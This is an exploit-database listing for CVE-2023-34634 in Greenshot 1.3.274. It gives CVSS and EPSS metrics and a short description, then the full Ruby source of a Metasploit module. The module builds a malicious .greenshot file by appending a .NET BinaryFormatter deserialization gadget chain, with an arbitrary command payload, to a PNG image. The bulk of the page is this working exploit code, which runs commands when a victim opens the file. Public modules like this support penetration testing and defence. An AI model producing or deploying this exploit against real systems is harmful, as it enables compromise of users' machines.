Greenshot 1.3.274 Deserialization / Command Execution Exploit

2023-08-1700:00:00

metasploit

0day.today

225

metasploit

greenshot

.net

deserialization

command execution

vulnerability

windows

cve

edb

png file

binary formatter

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

Confidence

High

EPSS

0.923

Percentile

99.0%

JSON

There exists a .NET deserialization vulnerability in Greenshot versions 1.3.274 and below. The deserialization allows the execution of commands when a user opens a Greenshot file. The commands execute under the same permissions as the Greenshot service. Typically, it is the logged in user.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',
        'Description' => %q{
          There exists a .NET deserialization vulnerability in Greenshot version 1.3.274
          and below.  The deserialization allows the execution of commands when a user opens
          a Greenshot file.  The commands execute under the same permissions as the Greenshot
          service.  Typically, is the logged in user.
        },
        'DisclosureDate' => '2023-07-26',
        'Author' => [
          'p4r4bellum',  # Discovery
          'bwatters-r7', # msf exploit
        ],
        'References' => [
          ['CVE', '2023-34634'],
          ['EDB', '51633']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Windows', {} ],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptPath.new('PNG_FILE', [false, 'PNG file to use'])
    ])
  end

  def exploit
    if datastore['PNG_FILE'].blank?
      image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
    else
      image_file = datastore['PNG_FILE']
    end

    datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?
    if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'
      datastore['FILENAME'] << '.greenshot'
    end
    cmd = payload.encoded

    image_data = File.binread(image_file)

    deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    )

    payload_length = deserialize_cmd.length
    outfile = image_data
    outfile << deserialize_cmd
    outfile << [payload_length].pack('Q')
    outfile << 'Greenshot01.02'
    file_create(outfile)
  end
end